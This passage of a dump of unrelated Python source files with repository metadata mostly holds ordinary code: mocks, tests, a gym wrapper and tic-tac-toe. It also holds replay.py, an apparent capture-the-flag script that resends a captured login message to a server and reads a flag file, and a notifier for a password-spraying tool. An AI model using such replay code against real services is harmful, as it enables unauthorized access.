message["properties"],
)
async def basic_client_ack(self, delivery_tag):
for message in self.unacked_messages[:]:
if delivery_tag == message["id"]:
self.unacked_messages.remove(message)
return message
async def basic_client_nack(self, delivery_tag, multiple=False, requeue=False):
message = await self.basic_client_ack(delivery_tag)
if message:
if requeue:
# put back on same queue
self.protocol.queues[message["queue"]].append(message)
else:
new_queue = self.protocol.dead_mapping[message["queue"]]
self.protocol.queues[new_queue].append(message)
async def basic_consume(self, handler, queue_name):
self.consumers.append(
asyncio.ensure_future(self._basic_consume(handler, queue_name))
)
async def publish(
self, message, exchange_name=None, routing_key=None, properties={}
):
if routing_key not in self.protocol.queues:
self.protocol.queues[routing_key] = []
self.protocol.queues[routing_key].append(
{
"id": str(uuid.uuid4()),
"message": message,
"properties": properties,
"queue": routing_key,
}
)
async def close(self):
self.closed = True
await asyncio.sleep(0.06)
class MockAMQPTransport:
def __init__(self):
pass
def close(self):
pass
class MockAMQPProtocol:
def __init__(self):
self.queues = {}
self.dead_mapping = {}
self.closed = False
self.channels = []
async def channel(self):
channel = MockAMQPChannel(self)
self.channels.append(channel)
return channel
async def wait_closed(self):
while not self.closed:
await asyncio.sleep(0.05)
raise GeneratorExit()
async def close(self):
self.closed = True
for channel in self.channels:
await channel.close()
async def send_heartbeat(self):
pass
async def amqp_connection_factory(*args, **kwargs):
return MockAMQPTransport(), MockAMQPProtocol()
| 29.427586 | 83 | 0.574408 | 452 | 4,267 | 5.25885 | 0.205752 | 0.060581 | 0.075726 | 0.031973 | 0.312158 | 0.263778 | 0.181321 | 0.155238 | 0.037863 | 0 | 0 | 0.003463 | 0.323178 | 4,267 | 144 | 84 | 29.631944 | 0.819598 | 0.005156 | 0 | 0.20354 | 0 | 0 | 0.036059 | 0.011784 | 0 | 0 | 0 | 0 | 0 | 1 | 0.053097 | false | 0.053097 | 0.017699 | 0 | 0.141593 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
17ecb3cdae4406d81c58cf487da09197d576b8b9 | 590 | py | Python | MagiSlack/__main__.py | riemannulus/MagiSlack | 3bcb5057ccc0699b2e4b0029f5d1c87e03a70356 | [
"MIT"
] | null | null | null | MagiSlack/__main__.py | riemannulus/MagiSlack | 3bcb5057ccc0699b2e4b0029f5d1c87e03a70356 | [
"MIT"
] | null | null | null | MagiSlack/__main__.py | riemannulus/MagiSlack | 3bcb5057ccc0699b2e4b0029f5d1c87e03a70356 | [
"MIT"
] | null | null | null | from os import environ
from MagiSlack.io import MagiIO
from MagiSlack.module import MagiModule
def hello_world(*args, **kwargs):
return f"HELLO WORLD! user {kwargs['name']}, {kwargs['display_name']}"
if __name__ == '__main__':
print('Magi Start!')
print('='*30)
print('MagiModule Initializing.')
module = MagiModule.MagiModule(environ['SLACK_API_TOKEN'])
print('Complete')
print('='*30)
print('MagiIO Initializing.')
io = MagiIO.MagiIO(module)
print('Complete')
print('='*30)
io.set_callback_func('hello', hello_world)
io.start()
| 21.851852 | 74 | 0.666102 | 71 | 590 | 5.323944 | 0.464789 | 0.079365 | 0.063492 | 0.10582 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012371 | 0.177966 | 590 | 26 | 75 | 22.692308 | 0.76701 | 0 | 0 | 0.277778 | 0 | 0 | 0.274576 | 0.040678 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0 | 0.166667 | 0.055556 | 0.277778 | 0.444444 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
17edcea77994ad95b7f15708cbc1815c28e54b7c | 2,234 | py | Python | my_plugins/YouCompleteMe/third_party/ycmd/ycmd/tests/server_utils_test.py | liutongliang/myVim | 6c7ab36f25f4a5e2e1daeab8c43509975eb031e3 | [
"MIT"
] | 2 | 2018-04-16T03:08:42.000Z | 2021-01-06T10:21:49.000Z | my_plugins/YouCompleteMe/third_party/ycmd/ycmd/tests/server_utils_test.py | liutongliang/myVim | 6c7ab36f25f4a5e2e1daeab8c43509975eb031e3 | [
"MIT"
] | null | null | null | my_plugins/YouCompleteMe/third_party/ycmd/ycmd/tests/server_utils_test.py | liutongliang/myVim | 6c7ab36f25f4a5e2e1daeab8c43509975eb031e3 | [
"MIT"
] | null | null | null | # Copyright (C) 2016-2018 ycmd contributors
#
# This file is part of ycmd.
#
# ycmd is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ycmd is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ycmd. If not, see <http://www.gnu.org/licenses/>.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Not installing aliases from python-future; it's unreliable and slow.
from builtins import * # noqa
from hamcrest import assert_that, calling, equal_to, raises
from mock import patch
from ycmd.server_utils import GetStandardLibraryIndexInSysPath
from ycmd.tests import PathToTestFile
@patch( 'sys.path', [
PathToTestFile( 'python-future', 'some', 'path' ),
PathToTestFile( 'python-future', 'another', 'path' ) ] )
def GetStandardLibraryIndexInSysPath_ErrorIfNoStandardLibrary_test( *args ):
assert_that(
calling( GetStandardLibraryIndexInSysPath ),
raises( RuntimeError,
'Could not find standard library path in Python path.' ) )
@patch( 'sys.path', [
PathToTestFile( 'python-future', 'some', 'path' ),
PathToTestFile( 'python-future', 'standard_library' ),
PathToTestFile( 'python-future', 'another', 'path' ) ] )
def GetStandardLibraryIndexInSysPath_FindFullStandardLibrary_test( *args ):
assert_that( GetStandardLibraryIndexInSysPath(), equal_to( 1 ) )
@patch( 'sys.path', [
PathToTestFile( 'python-future', 'some', 'path' ),
PathToTestFile( 'python-future', 'embedded_standard_library',
'python35.zip' ),
PathToTestFile( 'python-future', 'another', 'path' ) ] )
def GetStandardLibraryIndexInSysPath_FindEmbeddedStandardLibrary_test( *args ):
assert_that( GetStandardLibraryIndexInSysPath(), equal_to( 1 ) )
| 39.192982 | 79 | 0.745748 | 265 | 2,234 | 6.150943 | 0.449057 | 0.066258 | 0.127607 | 0.110429 | 0.407362 | 0.354601 | 0.320245 | 0.203681 | 0.132515 | 0.132515 | 0 | 0.00693 | 0.160251 | 2,234 | 56 | 80 | 39.892857 | 0.86194 | 0.325873 | 0 | 0.433333 | 0 | 0 | 0.195024 | 0.016812 | 0 | 0 | 0 | 0 | 0.133333 | 1 | 0.1 | true | 0 | 0.3 | 0 | 0.4 | 0.033333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
17ee2ab39fa3aef85b71231efdccae35147bec91 | 560 | py | Python | spraycharles/utils/notify.py | Tw1sm/passwordpredator | 57e173c68b1dfe89149fc108999f560bf1569cd7 | [
"BSD-3-Clause"
] | null | null | null | spraycharles/utils/notify.py | Tw1sm/passwordpredator | 57e173c68b1dfe89149fc108999f560bf1569cd7 | [
"BSD-3-Clause"
] | null | null | null | spraycharles/utils/notify.py | Tw1sm/passwordpredator | 57e173c68b1dfe89149fc108999f560bf1569cd7 | [
"BSD-3-Clause"
] | null | null | null | import pymsteams
from discord_webhook import DiscordWebhook
from notifiers import get_notifier
def slack(webhook, host):
slack = get_notifier("slack")
slack.notify(message=f"Credentials guessed for host: {host}", webhook_url=webhook)
def teams(webhook, host):
notify = pymsteams.connectorcard(webhook)
notify.text(f"Credentials guessed for host: {host}")
notify.send()
def discord(webhook, host):
notify = DiscordWebhook(
url=webhook, content=f"Credentials guessed for host: {host}"
)
response = webhook.execute()
| 25.454545 | 86 | 0.725 | 68 | 560 | 5.911765 | 0.382353 | 0.08209 | 0.141791 | 0.164179 | 0.223881 | 0.223881 | 0 | 0 | 0 | 0 | 0 | 0 | 0.171429 | 560 | 21 | 87 | 26.666667 | 0.866379 | 0 | 0 | 0 | 0 | 0 | 0.201786 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
17ef674eddb0b6d4127cc6eda09e667c21a0faed | 716 | py | Python | manage.py | SinnerSchraderMobileMirrors/django-cms | 157daefd30d9e82cc538a0c226539bf6681beabd | [
"BSD-3-Clause"
] | 2 | 2018-05-17T02:49:49.000Z | 2019-08-20T02:07:44.000Z | manage.py | SinnerSchraderMobileMirrors/django-cms | 157daefd30d9e82cc538a0c226539bf6681beabd | [
"BSD-3-Clause"
] | 2 | 2019-02-13T07:58:23.000Z | 2019-02-13T07:58:27.000Z | manage.py | SinnerSchraderMobileMirrors/django-cms | 157daefd30d9e82cc538a0c226539bf6681beabd | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
import sys
from cms.test_utils.cli import configure
from cms.test_utils.tmpdir import temp_dir
import os
def main():
with temp_dir() as STATIC_ROOT:
with temp_dir() as MEDIA_ROOT:
configure(
'sqlite://localhost/cmstestdb.sqlite',
ROOT_URLCONF='cms.test_utils.project.urls',
STATIC_ROOT=STATIC_ROOT,
MEDIA_ROOT=MEDIA_ROOT,
)
from django.core.management import execute_from_command_line
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "cms.test_utils.cli")
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()# -*- coding: utf-8 -*-
| 27.538462 | 81 | 0.632682 | 89 | 716 | 4.752809 | 0.505618 | 0.066194 | 0.113475 | 0.07565 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001908 | 0.268156 | 716 | 25 | 82 | 28.64 | 0.805344 | 0.058659 | 0 | 0 | 0 | 0 | 0.16369 | 0.125 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | true | 0 | 0.277778 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
17f3838494cef3ff36c0edabf5b3161b2c576936 | 1,716 | py | Python | sawyer/flat_goal_env.py | geyang/gym-sawyer | c6e81ab4faefafcfa3886d74672976cc16452747 | [
"MIT"
] | 4 | 2020-06-02T16:25:31.000Z | 2020-07-28T12:26:26.000Z | sawyer/flat_goal_env.py | geyang/gym-sawyer | c6e81ab4faefafcfa3886d74672976cc16452747 | [
"MIT"
] | 1 | 2020-09-30T10:24:04.000Z | 2020-09-30T10:24:04.000Z | sawyer/flat_goal_env.py | geyang/gym-sawyer | c6e81ab4faefafcfa3886d74672976cc16452747 | [
"MIT"
] | null | null | null | import gym
import numpy as np
# wrapper classes are anti-patterns.
def FlatGoalEnv(env, obs_keys, goal_keys):
"""
We require the keys to be passed in explicitly, to avoid mistakes.
:param env:
:param obs_keys: obs_keys=('state_observation',)
:param goal_keys: goal_keys=('desired_goal',)
"""
goal_keys = goal_keys or []
for k in obs_keys:
assert k in env.observation_space.spaces
for k in goal_keys:
assert k in env.observation_space.spaces
assert isinstance(env.observation_space, gym.spaces.Dict)
_observation_space = env.observation_space
_step = env.step
_reset = env.reset
# TODO: handle nested dict
env._observation_space = _observation_space
env.observation_space = gym.spaces.Box(
np.hstack([_observation_space.spaces[k].low for k in obs_keys]),
np.hstack([_observation_space.spaces[k].high for k in obs_keys]),
)
if len(goal_keys) > 0:
env.goal_space = gym.spaces.Box(
np.hstack([_observation_space.spaces[k].low for k in goal_keys]),
np.hstack([_observation_space.spaces[k].high for k in goal_keys]),
)
# _goal = None
def step(action):
nonlocal obs_keys
obs, reward, done, info = _step(action)
flat_obs = np.hstack([obs[k] for k in obs_keys])
return flat_obs, reward, done, info
def reset():
nonlocal goal_keys
obs = _reset()
# if len(goal_keys) > 0:
# _goal = np.hstack([obs[k] for k in goal_keys])
return np.hstack([obs[k] for k in obs_keys])
# def get_goal(self):
# return _goal
env.step = step
env.reset = reset
return env
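The closure-based wrapper above flattens a `Dict` observation into a single vector by concatenating the selected keys in a fixed order. A gym-free sketch of that flattening step (the helper name `flatten_obs` is mine, not from the file):

```python
def flatten_obs(obs, obs_keys):
    # Concatenate the selected dict entries in a fixed key order,
    # mirroring np.hstack([obs[k] for k in obs_keys]) above.
    flat = []
    for k in obs_keys:
        flat.extend(obs[k])
    return flat
```

For example, `flatten_obs({'state_observation': [1.0, 2.0], 'desired_goal': [3.0]}, ('state_observation', 'desired_goal'))` returns `[1.0, 2.0, 3.0]`.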
| 27.238095 | 78 | 0.634033 | 245 | 1,716 | 4.22449 | 0.244898 | 0.092754 | 0.052174 | 0.043478 | 0.500483 | 0.336232 | 0.336232 | 0.318841 | 0.245411 | 0.197101 | 0 | 0.001586 | 0.265152 | 1,716 | 62 | 79 | 27.677419 | 0.819191 | 0.209207 | 0 | 0.058824 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016129 | 0.088235 | 1 | 0.088235 | false | 0 | 0.058824 | 0 | 0.235294 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
17fa046b5f198637f7b0c78962349041958e3fcc | 689 | py | Python | replay.py | Plummy-Panda/MITM-V | 1b920d42267b02817e0dc2274dd13a415ba79e98 | [
"MIT"
] | null | null | null | replay.py | Plummy-Panda/MITM-V | 1b920d42267b02817e0dc2274dd13a415ba79e98 | [
"MIT"
] | 1 | 2015-12-03T06:16:53.000Z | 2015-12-03T06:16:53.000Z | replay.py | Plummy-Panda/MITM-V | 1b920d42267b02817e0dc2274dd13a415ba79e98 | [
"MIT"
] | null | null | null | import socket
import config
def main():
# get the login info, which is extracted from the packet
f = open('data/msg.txt', 'r')
msg = f.read()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (config.HOST, config.PORT)
print 'connecting to %s port %s' % server_address
sock.connect(server_address)
sock.sendall(msg) # replay login message
sock.sendall('ls\r\n') # to list the file
sock.sendall('cat flag1\r\n') # to get flag1
# send login
while True:
data = sock.recv(1024)
if data:
print data
print 'Close the socket!'
sock.close()
if __name__ == '__main__':
main()
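replay.py above is Python 2 (print statements, text-mode sockets). A Python 3 sketch of the same replay flow, where `sendall()` requires bytes and a context manager closes the socket; the function and its parameters are my own framing of the script, not part of the original:

```python
import socket

def replay(host, port, login_msg, commands, timeout=5):
    # Replay a captured login message, then each follow-up command,
    # and collect everything the server sends back until it closes.
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(login_msg)
        for cmd in commands:
            sock.sendall(cmd)
        chunks = []
        while True:
            data = sock.recv(1024)
            if not data:  # server closed the connection
                break
            chunks.append(data)
    return b''.join(chunks)
```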
| 22.966667 | 60 | 0.625544 | 98 | 689 | 4.265306 | 0.520408 | 0.093301 | 0.08134 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011742 | 0.258345 | 689 | 29 | 61 | 23.758621 | 0.806262 | 0.16836 | 0 | 0 | 0 | 0 | 0.142857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.1 | null | null | 0.15 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
17fa9c27681a820d868dd4675d7bac62973724aa | 424 | py | Python | sim.py | julieisdead/jtwitter-simulator | 933340a5a7aab9a229e4e4d28088169f58f99dbe | [
"MIT"
] | 1 | 2016-09-14T16:33:03.000Z | 2016-09-14T16:33:03.000Z | sim.py | julieisdead/jtwitter-simulator | 933340a5a7aab9a229e4e4d28088169f58f99dbe | [
"MIT"
] | null | null | null | sim.py | julieisdead/jtwitter-simulator | 933340a5a7aab9a229e4e4d28088169f58f99dbe | [
"MIT"
] | null | null | null | import jtweeter
access_token = "TWITTER_APP_ACCESS_TOKEN"
access_token_secret = "TWITTER_APP_ACCESS_TOKEN_SECRET"
consumer_key = "TWITTER_APP_CONSUMER_KEY"
consumer_secret = "TWITTER_APP_CONSUMER_SECRET"
user_id = 0 # user id of twitter user to simulate (placeholder)
def main():
jtweeter.tweet(access_token, access_token_secret, consumer_key, consumer_secret, user_id)
if __name__ == '__main__':
main() | 32.615385 | 94 | 0.778302 | 57 | 424 | 5.210526 | 0.350877 | 0.222222 | 0.171717 | 0.141414 | 0.319865 | 0 | 0 | 0 | 0 | 0 | 0 | 0.024862 | 0.146226 | 424 | 13 | 95 | 32.615385 | 0.79558 | 0.084906 | 0 | 0 | 0 | 0 | 0.303191 | 0.281915 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.1 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
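The four credential strings above are placeholders. A sketch of reading them from environment variables instead of hard-coding them in source (the helper name is mine; the variable names come from the script):

```python
import os

TWITTER_KEYS = (
    'TWITTER_APP_ACCESS_TOKEN',
    'TWITTER_APP_ACCESS_TOKEN_SECRET',
    'TWITTER_APP_CONSUMER_KEY',
    'TWITTER_APP_CONSUMER_SECRET',
)

def load_twitter_credentials(environ=os.environ):
    # Read each credential from the environment; raises KeyError if one is missing.
    return {name: environ[name] for name in TWITTER_KEYS}
```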
aa045e92b1da01e687147246d74bf80b0eabb154 | 1,547 | py | Python | pythonCore/ch03/E12.py | Furzoom/learnpython | a3034584e481d4e7c55912d9da06439688aa67ea | [
"MIT"
] | null | null | null | pythonCore/ch03/E12.py | Furzoom/learnpython | a3034584e481d4e7c55912d9da06439688aa67ea | [
"MIT"
] | null | null | null | pythonCore/ch03/E12.py | Furzoom/learnpython | a3034584e481d4e7c55912d9da06439688aa67ea | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
def read_text_file():
# get filename
fname = raw_input('Enter filename: ')
print
# attempt to open file for reading
try:
fobj = open(fname, 'r')
except IOError, e:
print '*** file open error:', e
else:
# display contents to the screen
for eachline in fobj:
print eachline,
fobj.close()
def write_text_file():
import os
ls = os.linesep
fname = ''
# get filename
while True:
fname = raw_input('Input filename: ')
if os.path.exists(fname):
print "ERROR: '%s' already exists" % fname
else:
break
# get file content (text) lines
all_content = []
print "\nEnter lines ('.' by itself quit).\n"
# loop until user terminates input
while True:
entry = raw_input('> ')
if entry == '.':
break
else:
all_content.append(entry)
# write lines to file with proper line-endling
fobj = open(fname, 'w')
fobj.writelines(['%s%s' % (x, ls) for x in all_content])
fobj.close()
print 'DONE!'
if '__main__' == __name__:
item = ''
while True:
print '(1) Write to file'
print '(2) Read from file'
print '(x) Exit'
item = raw_input('> ')
if item == '1':
write_text_file()
elif item == '2':
read_text_file()
elif item == 'x' or item == 'X':
break
else:
continue
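The write path above checks `os.path.exists()` before opening, which leaves a window where another process could create the file in between. In Python 3 the `'x'` open mode performs that existence check atomically; a sketch (the function name is mine):

```python
import os

def write_lines_exclusive(path, lines):
    # Mode 'x' raises FileExistsError if path already exists, replacing
    # the separate os.path.exists() check in the script above.
    with open(path, 'x') as fobj:
        fobj.writelines(line + os.linesep for line in lines)
```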
| 22.1 | 60 | 0.517776 | 186 | 1,547 | 4.182796 | 0.446237 | 0.041131 | 0.030848 | 0.041131 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005051 | 0.360052 | 1,547 | 69 | 61 | 22.42029 | 0.780808 | 0.155139 | 0 | 0.25 | 0 | 0 | 0.143297 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.020833 | null | null | 0.1875 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
aa05a5f5d054582877f87be6fff364e1313a693c | 8,894 | py | Python | pytictactoe.py | ruel/PyTicTacToe | e0b69de085b2b1e9ff5c13a7aeb1382406e4d859 | [
"Unlicense"
] | 1 | 2016-09-08T02:32:00.000Z | 2016-09-08T02:32:00.000Z | pytictactoe.py | ruel/PyTicTacToe | e0b69de085b2b1e9ff5c13a7aeb1382406e4d859 | [
"Unlicense"
] | null | null | null | pytictactoe.py | ruel/PyTicTacToe | e0b69de085b2b1e9ff5c13a7aeb1382406e4d859 | [
"Unlicense"
] | null | null | null | #!/usr/bin/python
'''
PyTicTacToe - Tic Tac Toe in Python
http://ruel.me
Copyright (c) 2010, Ruel Pagayon - ruel@ruel.me
All rights reserved.
Redistribution and use in source and binary forms, with or without
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of ruel.me nor the names of its contributors
may be used to endorse or promote products derived from this
script without specific prior written permission.
THIS SCRIPT IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL RUEL PAGAYON BE LIABLE FOR ANY
DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SCRIPT, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
General Description: The CPU difficulty is Human-Like. Means, you can still WIN!
I made it so, because I do not want this to be boring, and
end up with loses and draws.
'''
import os, random, time, operator
'''
Classes
'''
class Player:
'''
Class for players (user and cpu)
'''
def __init__(self, name, weapon):
self.name = name
self.weapon = weapon
self.moves = 0
self.first = False
self.won = False
class BoardCell:
'''
Class for the cells
'''
def __init__(self, number):
self.number = number
self.empty = True
self.content = ' '
def main():
'''
Main Program Flow
'''
recorduser, recordcpu, recorddraw = 0, 0, 0
while True:
# Toss the coin!
won = cointoss()
if won:
user = Player('User', 'X')
cpu = Player('CPU', 'O')
user.first = True
else:
user = Player('User', 'O')
cpu = Player('CPU', 'X')
cpu.first = True
print user.name if user.first else cpu.name, 'goes first.'
# Timeout 5 seconds
print 'Clearing screen in 3 seconds (Get Ready!)'
time.sleep(3)
# Let the game begin
tgame(user, cpu)
# Show the winner
if user.won:
recorduser += 1
winner = user
elif cpu.won:
recordcpu += 1
winner = cpu
else:
recorddraw += 1
winner = Player('DRAW', '-')
print '\nWINNER:', winner.name, '(' + winner.weapon + ')'
print 'Moves:', winner.moves
# Record
print '\nRecord:\tUser:', recorduser, '\n\tCPU:', recordcpu, '\n\tDRAW:', recorddraw
# Play Again?
while True:
choice = raw_input('\nPlay again? [Y]es or [N]o: ')
if choice == 'Y' or choice == 'N':
break
# If yes, clear the screen, else break the loop
if choice == 'Y':
cls()
else:
break
# Print empty space
print
'''
Sub function section
'''
def cointoss():
'''
Coin Toss sub function
'''
won = False
while True:
choice = raw_input('Heads or Tails (H or T): ')
if choice == 'H' or choice == 'T':
print 'Tossing Coin..'
coin = ['Heads', 'Tails'][random.randrange(0, 2)]
print '\n -- ', coin , ' -- \n'
if coin[0] == choice:
won = True
break
return won
def cls():
'''
Clear the screen (works for Windows and UNIX.. so far)
'''
os.system('cls' if os.name == 'nt' else 'clear')
def drawboard(board):
'''
Draw the board for the game
'''
cls()
boardstr = ''
print boardstr + '\n'
i = 0
for row in board:
boardstr += '\t'
if i == 0:
boardstr += ' | | \n\t'
boardstr += ' {0} | {1} | {2}\n'.format(*[cell.content for cell in row])
if i != 2:
boardstr += '\t | | \n\t------|-------|------\n\t | | \n'
else:
boardstr += '\t | | \n'
i += 1
print boardstr
def boardinit():
'''
Initialize the cells on the board
'''
return [[BoardCell((i + 1) + (j * 3)) for i in range(3)] for j in range(3)]
def bdraw(number, board, player):
'''
Draw the letter ('X' or 'O') to the board
'''
for i in range(3):
for j in range(3):
if board[i][j].number == number:
if board[i][j].empty:
board[i][j].content = player.weapon
board[i][j].empty = False
return True
return False
def usermove(user, board):
'''
User's turn
'''
user.moves += 1
while True:
number = 0
try:
number = int(raw_input('Your turn [1-9]: '))
except:
print 'Invalid input'
if number >= 1 and number <= 9:
if bdraw(number, board, user):
break
def cpumove(cpu, user, board):
'''
CPU's turn
'''
cpu.moves += 1
number = getwnumber(board, cpu.weapon)
if number == -2:
number = getwnumber(board, user.weapon)
while True:
if number <= 0:
number = random.randrange(1, 10)
if bdraw(number, board, cpu):
break
number = -1
def getboard(board, weapon):
'''
Get the board contents
'''
xo = []
for i in range(3):
for j in range(3):
if not board[i][j].empty:
if weapon == 'T':
xo.append(board[i][j].number)
else:
if board[i][j].content == weapon:
xo.append(board[i][j].number)
return xo
def getwnumber(board, weapon):
'''
Check if there's a winning/breaking cell
'''
number = -2
t = getboard(board, weapon)
ex = getboard(board, 'T')
# Line 1 of 8
if isin(1, t) and isin(2, t) and not isin(3, ex):
number = 3
elif isin(2, t) and isin(3, t) and not isin(1, ex):
number = 1
elif isin(1, t) and isin(3, t) and not isin(2, ex):
number = 2
# Line 2 of 8
elif isin(4, t) and isin(5, t) and not isin(6, ex):
number = 6
elif isin(5, t) and isin(6, t) and not isin(4, ex):
number = 4
elif isin(4, t) and isin(6, t) and not isin(5, ex):
number = 5
# Line 3 of 8
elif isin(7, t) and isin(8, t) and not isin(9, ex):
number = 9
elif isin(8, t) and isin(9, t) and not isin(7, ex):
number = 7
elif isin(7, t) and isin(9, t) and not isin(8, ex):
number = 8
# Line 4 of 8
elif isin(1, t) and isin(5, t) and not isin(9, ex):
number = 9
elif isin(5, t) and isin(9, t) and not isin(1, ex):
number = 1
elif isin(1, t) and isin(9, t) and not isin(5, ex):
number = 5
# Line 5 of 8
elif isin(3, t) and isin(5, t) and not isin(7, ex):
number = 7
elif isin(5, t) and isin(7, t) and not isin(3, ex):
number = 3
elif isin(3, t) and isin(7, t) and not isin(5, ex):
number = 5
# Line 6 of 8
elif isin(1, t) and isin(4, t) and not isin(7, ex):
number = 7
elif isin(4, t) and isin(7, t) and not isin(1, ex):
number = 1
elif isin(1, t) and isin(7, t) and not isin(4, ex):
number = 4
# Line 7 of 8
elif isin(2, t) and isin(5, t) and not isin(8, ex):
number = 8
elif isin(5, t) and isin(8, t) and not isin(2, ex):
number = 2
elif isin(2, t) and isin(8, t) and not isin(5, ex):
number = 5
# Line 8 of 8
elif isin(3, t) and isin(6, t) and not isin(9, ex):
number = 9
elif isin(6, t) and isin(9, t) and not isin(3, ex):
number = 3
elif isin(3, t) and isin(9, t) and not isin(6, ex):
number = 6
return number
def isin(val, list):
'''
Checking if a value exists in a list
'''
return val in list
def checknumber(xo):
'''Internal number checking. To prevent, messy code (sort of)'''
if isin(1, xo) and isin(2, xo) and isin(3, xo) or \
isin(4, xo) and isin(5, xo) and isin(6, xo) or \
isin(7, xo) and isin(8, xo) and isin(9, xo) or \
isin(1, xo) and isin(5, xo) and isin(9, xo) or \
isin(3, xo) and isin(5, xo) and isin(7, xo) or \
isin(1, xo) and isin(4, xo) and isin(7, xo) or \
isin(2, xo) and isin(5, xo) and isin(8, xo) or \
isin(3, xo) and isin(6, xo) and isin(9, xo):
return True
return False
def checkwin(board, weapon):
'''
Check if someone won already
'''
xo = getboard(board, weapon)
if checknumber(xo):
return True
return False
def checktie(board):
'''
Check if it's a draw
'''
t = getboard(board, 'T')
if len(t) == 9:
return True
return False
def tgame(user, cpu):
'''Main Game function'''
board = boardinit()
drawboard(board)
if cpu.first:
